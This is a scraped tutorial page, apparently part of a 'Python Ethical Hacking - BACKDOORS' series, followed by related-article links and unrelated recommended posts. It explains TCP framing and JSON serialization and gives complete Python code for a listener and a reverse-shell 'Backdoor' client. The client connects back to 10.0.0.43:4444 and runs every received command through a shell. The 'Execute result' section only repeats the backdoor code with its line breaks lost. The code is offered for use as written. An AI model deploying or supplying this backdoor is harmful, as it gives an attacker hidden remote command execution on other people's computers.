BACKDOORS Sockets

Problem:

  • TCP is stream-based.
  • Difficult to identify the end of message/batch.

Solution:

  • Make sure the message is well defined.
  • Implement a protocol that sends and receives methods conform to.
    • Send the size of the message as a header.
    • Append an end-of-message mark to the end of each message.
    • Serialize the message.

BACKDOORS Serialization

Benefits:

  • Message is well defined, receiver knows if message is incomplete.
  • Can be used to transfer objects(lists, dicts ...etc)

Implementation:

  • JSON and Pickle are common solutions.
  • JSON(Javascript Object Notation) is implemented in many programming languages.
  • Represents objects as text.
  • Widely used when transferring data between clients and servers.

Server Side - Listener Code:

#!/usr/bin/env python

import socket

import json

class Listener:

    def __init__(self, ip, port):

        listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

        listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)

        listener.bind((ip, port))

        listener.listen(0)

        print("[+] Waiting for incoming connections")

        self.connection, address = listener.accept()

        print("[+] Got a connection from " + str(address))

    def reliable_send(self, data):

        json_data = json.dumps(data).encode()

        self.connection.send(json_data)

    def reliable_receive(self):

        json_data = ""

        while True:

            try:

                json_data = json_data + self.connection.recv(1024).decode()

                return json.loads(json_data)

            except ValueError:

                continue

    def execute_remotely(self, command):

        self.reliable_send(command.decode())

        return self.reliable_receive()

    def run(self):

        while True:

            command = input(">> ").encode()

            result = self.execute_remotely(command)

            print(result)

my_listener = Listener("10.0.0.43", 4444)

my_listener.run()

Client Side - Backdoor code:

#!/usr/bin/env python

import json

import socket

import subprocess

class Backdoor:

    def __init__(self, ip, port):

        self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

        self.connection.connect((ip, port))

    def reliable_send(self, data):

        json_data = json.dumps(data).encode()

        self.connection.send(json_data)

    def reliable_receive(self):

        json_data = ""

        while True:

            try:

                json_data = json_data + self.connection.recv(1024).decode()

                return json.loads(json_data)

            except ValueError:

                continue

    def execute_system_command(self, command):

        return subprocess.check_output(command, shell=True)

    def run(self):

        while True:

            command = self.reliable_receive()

            command_result = self.execute_system_command(command)

            self.reliable_send(command_result.decode())

        connection.close()

my_backdoor = Backdoor("10.0.0.43", 4444)

my_backdoor.run()

Execute result:

#!/usr/bin/env pythonimport jsonimport socketimport subprocess

class Backdoor:    def __init__(self, ip, port):        self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)        self.connection.connect((ip, port))
    def reliable_send(self, data):        json_data = json.dumps(data).encode()        self.connection.send(json_data)
    def reliable_receive(self):        json_data = ""        while True:            try:                json_data = json_data + self.connection.recv(1024).decode()                return json.loads(json_data)            except ValueError:                continue
    def execute_system_command(self, command):        return subprocess.check_output(command, shell=True)
    def run(self):        while True:            command = self.reliable_receive()            command_result = self.execute_system_command(command)            self.reliable_send(command_result.decode())        connection.close()

my_backdoor = Backdoor("10.0.0.43", 4444)my_backdoor.run()

Python Ethical Hacking - BACKDOORS(3)的更多相关文章

  1. Python Ethical Hacking - BACKDOORS(8)

    Cross-platform hacking All programs we wrote are pure python programs They do not rely on OS-specifi ...

  2. Python Ethical Hacking - BACKDOORS(1)

    REVERSE_BACKDOOR Access file system. Execute system commands. Download files. Upload files. Persiste ...

  3. Python Ethical Hacking - BACKDOORS(7)

    Handling Errors: If the client or server crashes, the connection will be lost. Backdoor crashes if: ...

  4. Python Ethical Hacking - BACKDOORS(6)

    File Upload: A file is a series of characters. Uploading a file is the opposite of downloading a fil ...

  5. Python Ethical Hacking - BACKDOORS(5)

    File Download: A file is a series of characters. Therefore to transfer a file we need to: 1. Read th ...

  6. Python Ethical Hacking - BACKDOORS(4)

    REVERSE_BACKDOOR - cd command Access file system: cd command changes current working directory. It h ...

  7. Python Ethical Hacking - BACKDOORS(2)

    Refactoring - Creating a Listener Class #!/usr/bin/env python import socket class Listener: def __in ...

  8. Python Ethical Hacking - ARP Spoofing

    Typical Network ARP Spoofing Why ARP Spoofing is possible: 1. Clients accept responses even if they ...

  9. Python Ethical Hacking - NETWORK_SCANNER(2)

    DICTIONARIES Similar to lists but use key instead of an index. LISTS List of values/elements, all ca ...

随机推荐

  1. cb47a_c++_STL_算法_排列组合next_prev_permutation

    cb47a_c++_STL_算法_排列组合next_prev_permutation 使用前必须先排序.必须是 1,2,3或者3,2,1.否者结果不准确.如果, 1,2,4,6.这样数据不会准确nex ...

  2. redis基础二----操作List类型

    1.lpush的使用方法 2.rpsuh的使用方法 3.删除元素 lrem中2值的是删除2个集合中的“b”元素 4. 通过上面的分析,redis中的list比较类型java的qunue队列

  3. MarkDown编辑器的区别对比

    标题: MarkDown编辑器的区别对比 作者: 梦幻之心星 sky-seeker@qq.com 标签: [MarkDown, 编辑器,区别] 目录: [软件] 日期: 2020-6-22 前提说明 ...

  4. Ueditor富文本添加视频内容,视频不显示以及编辑富文本时,视频不显示解决方案

    问题是在添加视频时,编辑器会把视频标签<video>换成<img>.很讨厌... 1.2是解决添加视频时不显示,3是解决编辑时不显示 ueditor.all.js文件中  第7 ...

  5. Spring—容器外的Bean使用依赖注入

    认识AutowireCapableBeanFactory AutowireCapableBeanFactory是在BeanFactory的基础上实现对已存在实例的管理.可以使用这个接口集成其他框架,捆 ...

  6. Win8.1卸载64位Oracle Database 11g的详细图文步骤记录

    Oracle Database 11g在Win8 上的卸载过程记录. Step1停用oracle服务:进入计算机管理/任务管理器,在服务中,找到oracle开头的所有服务,右击选择停止: Step2 ...

  7. 基于托管的C++来使用WPF - Using WPF with Managed C++

    基于托管的C++来使用WPF - Using WPF with Managed C++ Posted by Zeeshan Amjad This article was originally publ ...

  8. socket 建立网络连接,client && server

    client代码: package socket; import java.io.IOException; import java.net.Socket; /** * 客户端_聊天室 * * @aut ...

  9. SpringCloud项目配置加载顺序

    bootstrap.yml:位于jar包外的优先级最高 application.yml: 配置中心的文件 > JVM参数配置> 本地active指定文件 > 本地default文件, ...

  10. pdfjs优化,实现按需加载,节省流量和内存

    1 问题 当使用pdfjs来实现预览功能的时候,遇到了2个问题: 一是带宽占用过大,会下载整个pdf文件,这对部署在公网的应用来说,成本压力很大,因为云服务带宽是很贵的. 二是内存占用过大,一个80M ...